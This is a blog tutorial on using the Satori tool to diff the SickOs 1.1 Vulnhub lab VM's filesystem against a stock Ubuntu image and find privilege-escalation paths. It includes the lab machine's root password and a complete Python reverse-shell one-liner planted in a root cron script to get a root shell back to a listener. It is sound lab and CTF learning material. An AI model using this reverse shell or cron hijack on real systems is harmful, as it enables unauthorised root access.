I came across a blog post while researching Linux privilege escalation techniques. The tool that the post covered was a mysterious pentesting tool I had never heard of before. This is how to use Satori for easy Linux privilege escalation. I plan on adding future target scenarios, but for now I will use SickOs v. 1.1 from vulnhub. I chose it because you need to open an SSH client connection to the target and I already know the root credentials for this one.
Want to own SickOs 1.1? Do it by going over my tutorial for SickOs 1.1 Vulnhub Walkthrough.
Table of Contents
How It Works
Satori comes with three different tools and these each complement the other. The way I explain it is that the three are the Imager, the Browser, and the Differ. There is another Remote, but really it is Imager via ssh. But why? Most of the CTF style vulnerable machines that you can download and exploit are usually Linux. This makes sense due to it being open source. Now what that means is that escalating privileges on a vulnerable machine will more than likely be introduced in the context of Linux permissions. In order to hide or intentionally create insecure configurations the creator of these machines makes changes that are clearly different than the standard operating system image. Should be easy to see the difference right? Wrong. That’s why Satori is so unique it leverages a robust Python set of scripts to facilitate the highlighting of these changes so that you don’t have to.
Here’s What You Need
- Get the repo from Github for Satori
- Kali Linux Virtual Machine (VirtualBox)
- SickOs Virtual Machine from Vulnhub (VirtualBox
Getting Started
Follow the installation directions to install Satori and let’s get started.
cd satori-master
python setup.py install
pip install scpclientTo use Satori you need an SSH client connection and vulnhub is the perfect match for this single use. What Satori does is hash the remote filesystem then compare it to the default filesystem of a typical Linux build. It then outputs the notable differences to aid in exploiting misconfigurations by highlighting the changes that have been made to the system.
The remote target I will use for this tutorial is vulnub’s SickOs 1.1 and I will open an SSH session using the root user’s credentials for the virtual machine. Spoilers!!! Yes, the infosec folks are extremely sensitive when it comes to spoilers and giving away details to those learning, but I really don’t care. The password is ‘john@123’.
One of the things similar posts fail to mention is that the repo doesn’t work out of the box. You have to change a few files to get them to work. These are the changes to make –
cp satori_imager.py satori-imager.py
cp satori_remote.py satori-remote.py
cp satori_remote.py satori-remote.pyImage the Remote Machine
Now to run Satori on the remote system. To do so run the Satori script like so, with your sickos credentials nearby.
python satori-remote.py [email protected] --v --argument 'hash --threads 4 -v'
Satori imager will run and output the results to a gzipped file.
Differ the Before and After
Now that Satori has taken an snapshot of the current remote image ( the one I have low level user access to and opened a connection back to my Kali instance via ssh ) the next step is ready. So Satori needs two different images, the captured snapshot of the remote host and the standard image for the operating system. The latter has (you guessed it?) also been run through Satori imager.
It would be great if someone already ran some of these popular Linux images through imager, right? Luckily github.com/operatorequals already has, get them from his Github repo. Here is how it goes, it is python satori-differ.py <standard image gzip> <remote captured image gzip>.
python satori-differ.py Linux-4.4.0-31-generic-i686-with-Ubuntu-14.04-trusty_HASH.jsn.gz hash.jsn.gz /directory-to-differ/The output is pretty amazing, there are so many changes. Some grepping can be done to remove some basic files that we have no interest in. Do this by using grep -v “word(s) to ignore”.
[EXISTENCE] File '/etc/init.d/mysql' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/squid3' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/udev-finish' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/stop-bootlogd' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/hostname' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/apache2' is not existent in the original image.
Looking at a common exploit avenue, cron jobs we see some irregularity in the new image’s configuration. I am looking for any scripts that are set to run where the owner of the script is root by chance.
python satori-differ.py ./Linux-4.4.0-31-generic-i686-with-Ubuntu-14.04-trusty_HASH.jsn.gz ./hash.jsn.gz -v /etc/ | grep "cron.d"
[EXISTENCE] File '/etc/cron.d/php5' is not existent in the original image.
[EXISTENCE] File '/etc/cron.d/automate' is not existent in the original image.Escalate Privileges
Exploring the newly created automate file found in the altered /etc/cron.d directory, the results are very promising. (This took how long as opposed to moving around at a whim) Satori clearly is a heavy contender for pentesting tool of the year.
Now I rely on a reverse shell oneliner from Pentestmonkey (go to for oneliners) and use the following to get a shell back this time as *root*.
Here’s a quick vim lesson: launch vi and move to the line you want to edit. Once you arrive hit a to start editing and when you are done hit esc + :wq to save and exit.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'By removing the python -c part and the surrounding quotation marks I wait and I wait…So instead I give it a push and set off the Python script. With my netcat listener open I wait again. Finally I get my new shell and I am now root.
Satori Browser
I couldn’t end without trying out Browser. The best way to describe this tool is to think of it as mounting the file system of the sickos machine but doing so locally in Kali.
python satori_browser.py hash.jsn.gz
I load the image using browser and I am able to move around and list the contents that I want to see.